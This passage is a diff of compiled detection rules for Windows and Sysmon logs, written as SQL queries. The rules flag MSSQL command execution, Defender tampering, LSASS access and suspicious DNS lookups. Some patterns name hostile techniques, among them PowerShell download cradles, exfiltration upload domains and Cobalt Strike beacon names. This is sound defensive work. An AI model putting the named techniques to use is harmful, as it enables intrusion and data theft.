"win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", - "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "status": "test", - "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1006" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '9' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((Image LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image IN ('System', 'Registry')) OR (Image LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\thor.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND Image LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND Image LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR Image LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "title": "Windows Defender Malware Detection History Deletion", + "id": "2afe6582-e149-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "author": "Cian Heasley", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Deletion of Defender malware detections history for legitimate reasons" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_history_delete.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects the restoration of files from the defender quarantine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "status": "experimental", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Administrator might try to disable defender features during testing (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows 